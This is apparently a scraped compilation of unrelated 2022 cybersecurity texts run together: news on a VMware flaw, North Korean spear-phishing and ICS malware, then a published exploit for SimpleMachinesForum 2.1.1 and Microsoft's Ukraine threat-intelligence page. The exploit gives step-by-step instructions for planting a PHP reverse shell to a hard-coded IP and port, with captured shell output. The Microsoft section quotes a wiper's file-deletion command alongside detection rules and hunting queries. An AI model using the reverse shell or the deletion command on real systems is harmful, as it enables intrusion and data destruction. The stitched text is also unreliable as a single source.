Threat actor is using the flaw to deliver Core Impact backdoor on vulnerable systems, security vendor says.

An Iranian cyber espionage group that some vendors track as Rocket Kitten has begun exploiting a recently patched critical vulnerability in VMware Workspace ONE Access/Identity Manager technology to deliver the Core Impact penetration testing tool on vulnerable systems.

VMware disclosed the remote code execution vulnerability (CVE-2022-22954) on April 6, the same time it released a patch for the issue along with fixes for a total of seven other — somewhat less critical — vulnerabilities that were privately reported to the company. VMware identified the RCE vulnerability as a server-side template injection issue that could be used for remote code execution. The software vendor assigned it a severity ranking of 9.8 on a scale of 10 because the flaw, among other things, allows attackers to gain the highest privileged access in compromised environments.

Days after the flaw was disclosed, proof-of-exploit code for it became publicly available on Twitter. Shortly thereafter, threat actors reportedly began attacking the flaw to install cryptocurrency coin miners on vulnerable servers.

Among those that began exploiting the flaw on Apr. 14 and 15 were attackers who used it to gain access to vulnerable networks and launch reverse HTTPS backdoors such as Core Impact, Cobalt Strike, and Metasploit beacons, Morphisec said in a report Monday. The tactics, techniques and procedures of the attackers suggested a link to Rocket Kitten, the security vendor said.

"Many groups appear to be exploiting this vulnerability, but there are not many groups deploying stolen Core Impact implants," says Michael Gorelik, CTO and head of threat research at Morphisec. "The US customer that we saw targeted here is one that has an outreach to many US customers. Unfortunately, we can't share any more details on that currently."

Morphisec has approached Core Security to validate the existence of the watermark within the implant, he says.

The presence of the Core Impact backdoor on the targeted network, he says, is an indication that an APT group was behind it, simply because of how rarely the backdoor has been used by others.

**Ransomware Risk**  
Morphisec described the new vulnerability as a server-side template injection in an Apache Tomcat component of VMware's Workspace ONE Access/Identity Manager that allows remote commands to be executed on the hosting server. The flaw greatly heightens the risk of ransomware attacks and significant security breaches for organizations using the vulnerable technology, the security vendor said.

VMware Workspace ONE Access was previously known as VMware Identity Manager. The technology is designed to give enterprises a way to quickly implement multifactor authentication, single sign-on, and conditional access policies for workers attempting to access enterprise SaaS, mobile, and Web application environments. "It is an identity provider and manager," Gorelik says. "It has access to all the organizational users and acts as access control to the environment."

Morphisec said several vulnerabilities have been disclosed in the VMware technology recently, including two other RCE flaws, CVE-2022-22958 and CVE-2022-22957. While both of these flaws are remotely executable, the attacker would need to have gained administrative access to the vulnerable server first. However, the new flaw from earlier this month does not require attackers to have this level of access to exploit it, Morphisec said.

**PowerShell in the Mix**  
In the attack that Morphisec observed, the attacker — after gaining initial access to the vulnerable system — deployed a PowerShell stager on it that in turn downloaded a highly obfuscated PowerShell script called PowerTrash Loader. The loader then loaded a Core Impact agent in system memory without leaving a trace of forensic evidence.

Gorelik says Morphisec researchers have previously observed APT groups such as Russia's FIN7 use PowerTrash Loader to upload remote-access Trojans such as JSSLoader on target systems in other campaigns.

"The PowerShell command is executed as a direct command sent through server-side template injection," Gorelik says. "The command is an obfuscated PowerTrash downloader that eventually deployed the Core Impact backdoor."

Organizations that implement VMware's patch for the flaw should be protected against it, he says. VMware's advisory noted the flaw is being actively exploited and pointed to workarounds for mitigating the threat for organizations that are not able to immediately patch against it.

Iranian Hacking Group Among Those Exploiting Recently Disclosed VMware RCE Flaw

Spear-phishing campaign loaded with new "Goldbackdoor" malware targeted journalists with NK News, analysts found.

New analysis has attributed a spear-phishing campaign targeting journalists covering North Korea to APT37/Ricochet Chollimia, a state-backed group linked to the Democratic People's Republic of Korea (DPRK). Notably, researchers said the group is deploying a novel malware strain called Goldbackdoor, a variation of Bluelight malware previously attributed to APT37.

According to a report from researchers at Stairwell, multiple phishing emails were sent to NK News on Mar. 18 that appeared to be from the personal email address of the previously compromised former head of of the South Korean National Intelligence Service, and contained Goldbackdoor malware. NK News handed over the information to Stairwell for further investigation, the cybersecurity firm said.

"Due to the sensitive nature of journalists' work, they are often targets of surveillance and malware, intent on stealing information, ferreting out sources or even destroying evidence and scaring the reporters into not publishing stories," Erich Kron, security awareness advocate at KnowBe4, said in response to the news. "In regimes like North Korea, where news is tightly controlled by the state, articles or information that paints the leadership or government in a negative light is treated as a serious threat to national security."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

North Korean State Actors Deploying Novel Malware to Spy on Journalists

Mandiant data also shows a dramatic drop in attacker dwell time on victim networks in the Asia-Pacific region — to 21 days in 2021 from 76 days in 2020.

The length of time attackers remained undetected on a victim's network decreased for the fourth year in a row, sinking to 21 days in 2021, down from 24 days in 2020, according to a new report on incident response (IR) investigations conducted by Mandiant.

Mandiant in its IR cases found that companies have tuned their detection capabilities to find the most dangerous attacks quickly, with ransomware detected within five days on average; non-ransomware attacks remained active for 36 days in 2021, down from 45 days in 2020. But the quicker detection of ransomware attacks may not necessarily be positive, instead being due to the activation of the payload, says Steven Stone, senior director of adversary operations for Mandiant.

In general, however, the improvement is driven by faster detection of non-ransomware threats because more companies are working with third-party cybersecurity firms, and government agencies and security firms often notify victims of attacks, leading to faster detection, he says.

"We think the combination of factors like these contributes to what we already see as year-over-year improvements in these regions," Stone says. "Ultimately, initial threat vectors come down to attacker choices and the availability of different vulnerabilities. Overall, we see some attack groups use different methods concurrently, likely showing a preference per target efforts."

Companies have improved their detection times dramatically over the past decade, reducing the time to detect attackers by nearly a factor of 20, from 418 days in 2011 to 21 days in 2021, according to the Mandiant M-Trends 2022 report.

    

Source: Mandiant

The improvement in company's detection capabilities varied significantly by region, with firms in the Asia-Pacific region seeing a dramatic drop in so-called "dwell time" to 21 days in 2021, from 76 days in 2020. European companies also saw a significant decrease to 48 days, from 66 days in 2020, while North American companies' detection did not change, staying level at 17 days.

**Attackers Love Cobalt Strike**  
The most popular attack tool remained the Beacon backdoor, which accounted for 28% of all identified malware families. Beacon is a component of the Cobalt Strike penetration testing tool, which is also popular with malicious attackers. Other attack tools quickly dropped off in frequency and include the Sunburst backdoor for .NET environments, the Metasploit penetration testing platform, and SystemBC, a proxy toolkit.

Overall, two methods of initial compromise — exploiting vulnerabilities and attacks through the supply chain — accounted for 54% of all attacks with an identified initial infection vector in 2021, up from less than a 30% share of attacks in 2020, according to Mandiant. The changing tactics underscore that companies need to keep informed of attackers' techniques, Jurgen Kutscher, executive vice president for service delivery at Mandiant, said in a statement announcing the report.

"In light of the continued increased use of exploits as an initial compromise vector, organizations need to maintain focus on executing on security fundamentals — such as asset, risk, and patch management," he said. "The key to building resilience lies in preparation. Developing a robust preparedness plan and well-documented and tested recovery process can help organizations successfully navigate an attack and quickly return to normal business operations."

**Active Directory in the Bullseye**  
In another trend, attackers are increasingly taking aim at hybrid Active Directory (AD) installations, because misconfigurations in the hybrid identity model — where credentials and keys are synchronized between on-premises AD services and Azure Active Directory in the cloud — lead to compromises, Mandiant stated in the report.

Companies should treat hybrid Active Directory servers as the most sensitive level of assets, tier 0, and only allow access from privileged workstation from a segmented network. Along with monitoring, these steps should make exploitation much more difficult, says Evan Pena, managing director of Mandiant's global red team.

Luckily, implementing best security practices for hybrid AD servers is not hard to get right, he says.

"As companies move their resources to the cloud while using hybrid models, attackers will target these hybrid servers to achieve both domain and cloud compromise," he says. "It is common for these hybrid servers to have high-level privileges to on-premises servers — \[such as\] domain controllers — and cloud resources."

Companies should be tackling the primary threat this year by reviewing and assessing their Active Directory implementation for vulnerabilities or misconfigurations, understanding how to detect and prevent unusual lateral movement attempts in their environment, and implementing application whitelisting and disabling macros to significantly limit initial access attacks, says Pena.

More Than Half of Initial Infections in Cyberattacks Come Via Exploits, Supply Chain Compromises

The recent discovery of highly customized malware targeting programmable logic controllers has renewed concerns about the vulnerability of critical infrastructure.

The US Cybersecurity and Infrastructure Security Agency (CISA), along with the NSA, FBI, and others, this week urged critical infrastructure organizations — especially in the energy sector — to implement defenses against a set of highly sophisticated cyberattack tools designed to target and disrupt industrial environments.

The warning applies particularly to ICS and OT networks using programmable logic controllers (PLCs) from Schneider Electric and Omron and servers based on Open Platform Communications Unified Architecture (OPC UA). The advisory was prompted by the recent discovery of three malware tools custom-built to target these technologies and manipulate them in dangerous and potentially destructive ways. However, the malware can be adapted to attack other ICS technologies as well.

CISA's advisory contained a series of mitigation measures that it recommended organizations implement proactively to reduce exposure to the new threat.

Mandiant analyzed the new attack tools recently in partnership with Schneider and is collectively tracking them under the name INCONTROLLER. In a report this week, the security vendor described the malware as having an "exceptionally rare and dangerous" capability and posing a critical risk to organizations that use the targeted equipment. Mandiant compared INCONTROLLER to previous ICS-specific threats such as Stuxnet, which was used to destroy hundreds of centrifuges at an Iranian nuclear-enrichment facility in 2010, and Industroyer, which caused a power outage in Ukraine in 2016.

**Work of a Russian State-Sponsored Group?**  
"We believe INCONTROLLER is very likely linked to a state-sponsored group given the complexity of the malware, the expertise and resources that would be required to build it, and its limited utility in financially motivated operations," says Rob Caldwell, director of industrial control systems and operational technology at Mandiant. He says Mandiant has been unable to associate the malware with any previously tracked group but believes those behind it are most likely Russia-linked. "While our evidence connecting INCONTROLLER to Russia is largely circumstantial, we note it given Russia's history of destructive cyberattacks, its current invasion of Ukraine, and related threats against Europe and North America."

Mandiant identified one of the attack tools as "Tagrun," a tool for scanning OPC environments, enumerating OPC servers, harvesting data from them, and brute-forcing credentials. The security vendor identified the tool as likely used for conducting reconnaissance on industrial networks. Mandiant has dubbed the second tool as "Codecall," which it described as a framework that uses two common industrial protocols — Modbus and Codesys — to communicate and interact with at least three Schneider PLCs. The malware can identify Schneider and other Modbus-enabled devices on a network and connect to them using the two protocols. The third tool, "Omshell," targets Omron PLCs via HTTP, Telnet, and a proprietary Omron protocol. It is designed to interact with a mechanism on Omron devices for monitoring the safe running of so-called servo motors used in industrial applications. The malware can gain shell access to Omron PLCs and take a variety of malicious actions, including wiping device memory, resetting a device, loading backup data, and executing arbitrary code on it.

Collectively the malware tools have capabilities that allow attackers to surveil and collect data from target industrial environments that they can then use to identify high-value systems and to launch potentially catastrophic attacks against them in industrial settings. Potential attack scenarios include threat actors using Omshell and/or Codecall to crash targeted PLCs and disrupt operations; sending malicious commands to PLCs to sabotage industrial processes; or disabling safety controllers to cause physical destruction in a plant or industrial setting.

"The components of INCONTROLLER contain more sophisticated methods of interacting with and attacking or modifying the targeted devices than seen in previous ICS-specific malware," Caldwell says. These components are designed to make interaction with PLC devices easy for attackers with little detailed knowledge of the targeted ICS protocols. "Further, these components are modular and could be extended to target additional devices or add additional capabilities," he says.

Mandiant said it is also tracking two other tools targeted at Windows-based systems that appear to be related to INCONTROLLER activity. One of them exploits a known vulnerability, CVE-2020-15368, to install and exploit a vulnerable driver on target systems, and the other is a backdoor that enables reconnaissance activity. The tools could be used to support a threat actor's broader goals in an industrial cyberattack, Mandiant said.

**A Clear and Present Danger to Industrial Environments**  
ICS security vendor Dragos listed a total of 16 devices and software tools from Omron and Schneider that it said the malware was designed to interact with and exploit. The technologies are used in a wide range of industry verticals. But Dragos said its analysis of the malware suggests it is targeted mostly at equipment in liquefied natural gas (LNG) and electric power environments.

Dragos is collectively tracking the attack tools as "PIPEDREAM" and the threat actors behind it as "CHERNOVITE." A whitepaper that the company released this week on the threat identified the threat actor as having the ability — among other things — to manipulate the torque and speed of Omron servo motors in a way that could cause enough physical destruction to result in loss of life. Dragos' whitepaper listed several other malicious actions that threat actors could use the malware for, including triggering denial of control and denial for view for ICS operators; disrupting operating technology by masquerading as a trusted process; disabling process controllers to extend time-to-recovery from an incident; and undermining authentication and encryption mechanisms in OT environments.

"PIPEDREAM is a clear and present threat to the availability, control, and safety of industrial control systems and processes endangering operations and lives," Dragos said.

News of the malware tools comes just days after reports of Ukraine's computer emergency response team (CERT-UA) thwarting an effort by Russia's Sandworm group to disrupt the country's power grid using Industroyer, one of the first known malware tools targeted specifically at the electric grid. So far, researchers have discovered at least seven highly sophisticated ICS-specific attack tools, which include Stuxnet, Industroyer, Triton, and BlackEnergy.

Danielle Jablanski, OT cybersecurity strategist at Nozomi Networks, says the combined tools in this case were built to search for specific devices, to understand their operational parameters, to gain credentialed access, and to remotely control various legitimate functions of the devices for their intended objectives. "These are customizable based on the devices targeted but can be modified to target additional devices that leverage the same protocols," she says.

Jablanski says that options for thwarting attacks become scarce when threat actors have the credentials and know how to use devices based on their design, protocols, and features.

It's presently unclear in what host environment the newly discovered tools were found. But typically, some stop-gap measures for mitigating exposure to the threat would include disabling unnecessary functionality, introducing access controls to limit legitimate users who communicate with the device, and taking password management seriously. "Device hardening to limit the susceptibility and severity of cyber incidents is a staple of defense in depth strategies across ICS/OT environments," she says.

Eric Byres, CEO of aDolus Technology, says the new tools highlight a recent trend away from previous attacks where threat actors gained access to an OT environment by leapfrogging to it from the IT network. Those kinds of attacks have become less common with many organizations tightening OT security. So, sophisticated attackers are finding other ways to establish access to their victims' OT networks, he says pointing to Stuxnet as an example.

"Stuxnet did it through a combination of infected USB flash drives, printer sharing, and modified PLC logic files," he says. Similarly, Dragonfly, which was Russian in origin, attacked the manufacturers of OT control equipment and replaced the software they supplied to their industrial customers with trojanized versions.

"These supply chain-driven attacks are now becoming the preferred method for nation-state attackers, especially the Russian spy agencies," Byres says. "By going after OT suppliers rather than the OT systems directly, they get tremendous multiplication effects."

New Malware Tools Pose 'Clear and Present Threat' to ICS Environments

SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Authenticated Remote Code Execution in SimpleMachinesForum 2.1.1

\# Remote Code Execution in SimpleMachinesForum 2.1.1 and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. SimpleMachinesForum 2.1.1 and earlier allows remote authenticated administrators to execute arbitrary code by inserting a vulnerable php code because the themes can be modified by an administrator.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 7th March 2022

\# CVE ID: CVE-2022-26982

\# Confirmed on release 2.1.1

\# Vendor: https://download.simplemachines.org/

\# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!

###############################################

#Step1- Login with Admin Credentials

#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php

#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>

#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page

#Step5- Now click on "Themes and Layout" and you will get the reverse shell:

E.g: Visit http://IP\_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:

listening on \[any\] 4477 ...

connect to \[192.168.56.1\] from (UNKNOWN) \[192.168.56.130\] 41276

bash: cannot set terminal process group (1334): Inappropriate ioctl for device

bash: no job control in this shell

daemon@debian:/opt/bitnami/simplemachinesforum$ whoami

whoami

daemon

daemon@debian:/opt/bitnami/simplemachinesforum$ id

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

daemon@debian:/opt/bitnami/simplemachinesforum$

CVE-2022-26982: 0days/Exploit.txt at main · sartlabs/0days

UPDATE 27 Apr 2022: See Updated malware details and Microsoft security product detections below as discussed in the Special Report: Ukraine.
UPDATE 02 MAR 2022: See Updated malware details and Microsoft security product detections below for additional insights and protections specific to the evolving threats we have identified impacting organizations with ties to Ukraine.

**UPDATE 27 Apr 2022:** See **_Updated malware details and Microsoft security product detections_** below as discussed in the **Special Report: Ukraine**.

**UPDATE 02 MAR 2022:** See **_Updated malware details and Microsoft security product detections_** below for additional insights and protections specific to the evolving threats we have identified impacting organizations with ties to Ukraine.

Microsoft has been monitoring escalating cyber activity in Ukraine and has published analysis on observed activity in order to give organizations the latest intelligence to guide investigations into potential attacks and information to implement proactive protections against future attempts.

We’ve brought together all our analysis and guidance for customers who may be impacted by events in Ukraine into this single location for ease of consumption, all of which is linked below. In this blog, we’ve also included general security guidance for organizations to build cyber resilience. As the situation in the region develops, we will continue to publish new insights and add to this set of resources.

Microsoft has been notifying customers in Ukraine of activity, where possible, and closely coordinating with the government in Ukraine. This support is ongoing.

We have also summarized information about what we are doing around protecting organizations in Ukraine from cyberattacks; protecting against state-sponsored disinformation campaigns; supporting humanitarian assistance; and protecting our employees: Digital technology and the war in Ukraine.

**Published Microsoft analysis of malicious activity in Ukraine**

_Phishing attacks on Ukrainian soldiers:_

*   February 25, 2022 | RiskIQ: UNC1151/GhostWriter Phishing Attacks Target Ukrainian Soldiers

_Recent disk wiping attacks:_

*   February 24, 2022 | RiskIQ: HermeticWiper Compromised Server Used in Attack Chain

_Advanced threat actor ACTINIUM which has consistently pursued access to organizations in Ukraine or entities related to Ukraine affairs:_

*   February 4, 2022 | Microsoft Security Blog: ACTINIUM targets Ukrainian organizations
*   February 4, 2022 | RiskIQ threat intelligence article: ACTINIUM targets Ukrainian organizations
*   February 4, 2022 | Microsoft Threat Analytics article (requires a license): Threat Insights: ACTINIUM targets Ukrainian organizations

_Destructive malware operation and malware family known as WhisperGate targeting multiple organizations in Ukraine:_

*   January 15, 2022 | Microsoft on the Issues Blog: Malware attacks targeting Ukraine government
*   January 15, 2022 | Microsoft Security Blog: Destructive malware targeting Ukrainian organizations
*   January 15, 2022 | RiskIQ threat intelligence article: Destructive malware targeting Ukrainian organizations

OSINT (open source intelligence) articles around activity in Ukraine are published regularly into the RiskIQ Community. The full list is available here: RiskIQ Community articles on Ukraine activity.

**Security guidelines and recommendations**

We recommend that customers review their security posture and implement best practices to build resilience against today’s threats. Below are recommendations and links to resources:

1.  **Cybersecurity hygiene:** Organizations should harden all systems by following basic principles of cyber hygiene to proactively protect against potential threats. Microsoft recommends taking the following steps:

*   Enable multifactor authentication
*   Apply least privilege access and secure the most sensitive and privileged credentials
*   Review all authentication activity for remote access infrastructure
*   Secure and manage systems with up-to-date patching
*   Use anti-malware and workload protection tools
*   Isolate legacy systems
*   Enable logging of key functions
*   Validate your backups
*   Verify your cyber incident response plans are up to date

2.  **Microsoft Security Best Practices:** Microsoft customers can follow best practices that provide clear actionable guidance for security related decisions. These are designed to improve your security posture and reduce risk whether your environment is cloud-only, or a hybrid enterprise spanning cloud(s) and on-premises data centers: Microsoft Security Best Practices  
    
3.  **Protect against ransomware and extortion:** Human-operated ransomware attacks can be catastrophic to business operations and are difficult to clean up, requiring complete adversary eviction to protect against future attacks. Follow our ransomware specific technical guidance to help prepare for an attack, limit the scope of damage, and remove additional risks: Human-operated ransomware
    

****Updated malware details and Microsoft security product detections** **Updated malware details and Microsoft security product detections****

For customers utilizing Microsoft security products, we continue to build and release protections for the evolving threats we have identified impacting organizations with ties to Ukraine. As noted in the published analysis above, there are multiple actors using a variety of tools and techniques in this dynamic threat landscape. Some of these threats are assessed to be more closely tied to nation-state interests, while others seem to be more opportunistically attempting to take advantage of events surrounding the conflict. We have observed attacks reusing components of known malware that are frequently covered by existing detections, while others have used customized malware for which Microsoft has built new comprehensive protections.

**Destructive wiper attacks Destructive wiper attacks**

Beginning with WhisperGate, Microsoft continues to observe destructive malware attacks impacting organizations in Ukraine. These attacks are often the final stage to intrusions that, in some cases, may have predated the current military actions in Ukraine. We assess that the intended objective of these attacks is the disruption, degradation, and destruction of targeted resources. The Microsoft Threat Intelligence Center (MSTIC) assesses that organizations within Ukraine continue to be at high-risk for destructive operations for the foreseeable future.

Microsoft Defender Antivirus provides detections for the wiper attacks in build version **1.363.797.0** or newer. Customers utilizing automatic updates do not need to take additional action. Enterprise customers managing updates should select the detection build **1.363.797.0** or newer and deploy it across their environments.

The following is a list of high-level activities and the related malware that Microsoft has identified and is protecting customers against:

**WhisperGate WhisperGate**

Limited-scope destructive malware attack on January 13, 2022 impacting dozens of systems spanning multiple government, non-profit, and information technology organizations, all based in Ukraine. MSTIC tracks the actor responsible for this attack as DEV-0586 and has not linked it to a previously known activity group. We assess that DEV-0586 continues to be active in Ukraine but is also targeting other countries within the region.

**FoxBlade and SonicVote FoxBlade and SonicVote**

Destructive malware attack originally discovered on February 23, 2022 impacting hundreds of systems spanning multiple government, information technology, financial sector, and energy organizations predominately located in or with nexus to Ukraine. MSTIC has attributed events associated with FoxBlade with medium confidence to IRIDIUM (previously tracked as DEV-0665). Microsoft assesses there will be a continued risk for destructive activity from this group, as we have observed follow-on intrusions since February 23 involving these malicious capabilities. Microsoft is tracking the following malware families related to this activity:

*   FoxBlade (aka HermeticWiper / HermeticWizard)
*   SonicVote (aka HermeticRansom)

IRIDIUM has also periodically leveraged a renamed version of the SysInternals utility _sdelete_(renamed by IRIDIUM to _cdel.exe_) to perform targeted secure deletion of areas of the file system using the following command-line pattern:

c:\Windows\System32\cmd.exe /C C:\Windows\cdel.exe -accepteula -r -s -q c:\Users & C:\Windows\cdel.exe -accepteula -r -s -q c:\ProgramData

**Lasainraw (aka IsaacWiper) Lasainraw (aka IsaacWiper)**

Limited destructive malware attack originally identified by ESET on February 25, 2022. Microsoft continues to investigate this incident and has not currently linked it to attributed threat actors.

**DesertBlade DesertBlade**

Limited destructive malware attack in early March 2022 impacting a single Ukrainian entity. Similar to other destructive capabilities, DesertBlade, which is implemented in Golang, was deployed via hijacked Group Policy Objects (GPOs). DesertBlade is responsible for iteratively overwriting and then deleting overwritten files on all accessible drives (sparing the system if it is a domain controller). Due to the nature of the investigation and partnerships involved, Microsoft is currently not able to share samples of DesertBlade. However, we can share the following hashes as examples of the DesertBlade family:

*   a71c8306b6b8a89c18dea3b1490037593737d59b023000f24da94e3275600b59
*   4ca63406ff189301ccbb54daa6e2da4bc5d03ffc1a8a9756717d95d26abc3906

The following Yara rule can be used to detect DesertBlade using these hashes:

rule DesertBlade { meta: author = "Microsoft Threat Intelligence Center (MSTIC)" description = "Detects Golang package, function, and source file names observed in DesertBlade samples" hash = "a71c8306b6b8a89c18dea3b1490037593737d59b023000f24da94e3275600b59" strings: $s1 = "main.wipe\x00\x00" $s2 = "main.getRandomByte\x00\x00" $s3 = "main.drives\x00\x00" $s4 = "main.main.func3\x00\x00" $s5 = "walk.volumeNameLen\x00\x00" $s6 = "windows.GetLogicalDriveStrings\x00\x00" $s7 = "api.ExplicitAccess\x00\x00" $s8 = "go-acl.GrantSid\x00\x00" $s9 = "/src/w/w.go\x00\x00" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and filesize < 5MB and filesize > 1MB and all of ($s*) }

**FiberLake (aka DoubleZero) FiberLake (aka DoubleZero)**

On March 22, 2022 CERT-UA published details on a .NET capability being used in destructive attacks tracked by Microsoft as FiberLake (aka DoubleZero). Microsoft has observed FiberLake being used in attacks targeting Ukraine broadcast/media organizations. Microsoft is continuing to investigate this incident and has not currently linked it to known threat activity.

**CaddyWiper and AprilAxe (aka ARGUEPATCH) CaddyWiper and AprilAxe (aka ARGUEPATCH)**

CaddyWiper was first discovered by ESET on March 14, 2022 and has been observed by Microsoft impacting a limited number of organizations in targeted attacks. CaddyWiper is a destructive capability that results in file and drive overwriting, rendering compromised systems unbootable. On April 1, 2022, Microsoft identified a new variant that involved a multi-stage loading process.

In this new variant, the threat actor leveraged a backdoored IDA debugger server executable, which Microsoft has named AprilAxe\*.\* AprilAxe is designed to de-obfuscate and load malicious code from disk. In all observed intrusions, the loader is paired with a variant of CaddyWiper. Microsoft has observed multiple impacted organizations across government, natural resources, banking, and energy organizations. ESET published technical details on this new version of CaddyWiper/ARGUEPATCH. In line with ESET, MSTIC also attributes the intrusion activity and capabilities to IRIDIUM.

**Industroyer.B (aka Industroyer2) Industroyer.B (aka Industroyer2)**

On April 8, 2022, Microsoft observed AprilAxe and CaddyWiper being staged to target an energy organization in Ukraine. During this intrusion, the actors also deployed a malicious ICS/SCADA utility named Industroyer 2, which is capable of interacting with industrial control systems. CERT-UA and ESET published additional technical details on this capability. In line with ESET, MSTIC attributes this intrusion activity and capability to IRIDIUM.

Customers are encouraged to turn on cloud-delivered protection and automatic sample submission in Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. As we continue to investigate these attacks and uncover new data, we will add or update protections.

Microsoft Defender Antivirus and Microsoft Defender for Endpoint customers should look for the following family names for activity related to the wiper attacks:

*   WhisperGate
*   FoxBlade
*   Lasainraw
*   SonicVote
*   CaddyWiper
*   AprilAxe
*   FiberLake
*   Industroyer
*   DesertBlade

The observed wiper attacks can be further limited through additional hardening configurations. When enabled, these features bring more resilience to customer defenses in addition to defending against these specific wiper attacks:

*   Tamper protection prevents common techniques observed to disable security protections on endpoints.
*   Controlled folder access allows only trusted apps to access protected folders. It is typically effective at blocking these wiper attacks.

**Unattributed threat activity**

As part of continued efforts by the MSTIC and Microsoft 365 Defender Research teams to identify threat activity and protect organizations, we continue to discover unattributed threat activity. We will continue to analyze activity and build detections for these threats as they are identified.

As with any observed nation-state actor activity, where possible, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with information they need to help guide their investigations. MSTIC is also actively working with members of the global security community and other strategic partners to share information that can help address this evolving threat through multiple channels. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity.

**Common secondary intrusion behaviors**

Many of the observed attacks have made use of known malware and intrusion tactics, techniques, and procedures (TTPs) that are detected by Microsoft Defender for Endpoint using these common alerts:

*   Suspicious remote activity
*   Suspicious access to LSASS service
*   Microsoft Defender Antivirus tampering
*   Suspicious remote activity

Customers who see incidents that tie one or more of these indicators together should prioritize investigation of the affected devices.

**Opportunistic phishing campaigns**

Taking advantage of interest in the geopolitical conflict, attackers have been observed using tailored domains in phishing attacks. Microsoft SmartScreen and the network protection feature in Microsoft Defender for Endpoint provide protections for customers lured to these domains, including, but not limited to, the following:

*   help-for-ukraine\[.\]eu
*   tokenukraine\[.\]com
*   ukrainesolidarity\[.\]org
*   ukraine-solidarity\[.\]com
*   saveukraine\[.\]today
*   supportukraine\[.\]today

**Hunting for related attacks**

Microsoft Sentinel and Microsoft Defender for Endpoint customers can hunt for related activity through the queries below:

**Microsoft Sentinel**

Microsoft Sentinel offers detection and threat hunting analytics for techniques observed in relation to these threats. These analytics can be found in the Microsoft Sentinel portal or via the Microsoft Sentinel GitHub.

Crash dump disabled on host

This query looks for registry keys being set on a host in order to prevent crash dumps being created.

https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/Crashdumpdisabledonhost.yaml

New EXE deployed via Default Domain or Default Domain Controller Policies

This query looks for executables executed on host that appear to have been deployed via the Default Domain Policy or the Default Domain Controller Policy. These policies are not typically used for distributing executables.

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/NewEXEdeployedviaDefaultDomainorDefaultDomainControllerPolicies.yaml

Potential renamed Sdelete usage

This query looks for command line parameters associated with recursive use of Sdelete against the C drive where the originating process isn’t named _sdelete.exe._

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/Potentialre-namedsdeleteusage.yaml

Sdelete deployed via GPO

This query looks for Sdelete being deployed via GPO and run recursively on a host.

https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/SdeletedeployedviaGPOandrunrecursively.yaml

**Microsoft Defender for Endpoint**

To locate possible exploitation activity, run the following queries:

Surface suspicious MSHTA process execution

Use this query to look for MSHTA launching with command lines referencing DLLs in the AppData\\Roaming path.

    DeviceProcessEvents
    | where FileName =~ "mshta.exe"
    | where ProcessCommandLine has_all (".dll", "Roaming")
    | where ProcessCommandLine contains @"Roaming\j"
    | extend DLLName = extract(@"[jJ][a-z]{1,12}\.dll", 0, ProcessCommandLine)
    

Surface suspicious Scheduled Task activity

Use this query to look for Scheduled Tasks that may relate to actor activity.

    DeviceProcessEvents
    | where ProcessCommandLine has_all ("schtasks.exe", "create", "wscript", "e:vbscript", ".wav")
    

Potential renamed _sdelete_ usage

Use this query to look for command line parameters associated with the use of a renamed Sysinternals sdelete tool to delete multiple files on the C drive as part of destructive attacks on a host.

    DeviceProcessEvents
    | where InitiatingProcessFileName !~ "sdelete.exe"
    and InitiatingProcessCommandLine has_all ("-accepteula", "-r", "-s", "-q", "c:/")
    and InitiatingProcessCommandLine !has ("sdelete")
    

Microsoft continues to investigate these attacks and improve protections as new data is analyzed. In addition, Microsoft Sentinel and Microsoft 365 Defender have a range of existing queries for the detection of common techniques, such as lateral movement and privilege escalation. We recommend customers use these queries to identify common attacker techniques being used in these attacks.

We continue to monitor activity and will update this page with more information as the situation develops.

Cyber threat activity in Ukraine: analysis and resources

“There are few jobs where I can say, I make two billion people more secure on the internet every single day.”
Childhood Look: Goth kid, all in black
Current Look: Cyber Viking
Childhood hobby: Head banging to Metallica, Marilyn Manson, and Guns N’ Roses
Current hobby: n0x08 DJ’s Live events around the world.

_“There are few jobs where I can say, I make two billion people more secure on the internet every single day.”_

**Childhood Look:** Goth kid, all in black

**Current Look:** Cyber Viking

**Childhood hobby:** Head banging to Metallica, Marilyn Manson, and Guns N’ Roses

**Current hobby:** n0x08 DJ’s Live events around the world. Check him out here.

**Most Innocent Hack:** Finding a backdoor admin interface to his public library. He moved his name to the top of the waitlist on books he wanted to read.

**Proudest Achievement** : Starting the CTI League

This month’s researcher spotlight is on Nate Warfield. If you’ve heard his name, it’s probably from one of two ways. Warfield is the Chief Technology Officer of Prevailion, a next-generation cyber intelligence company who protect orgs from cyber threats targeting their networks. Or it’s from when Warfield was a member of the MSRC team where he was one of the (unofficial) voices and faces of MSRC to the security researcher community.

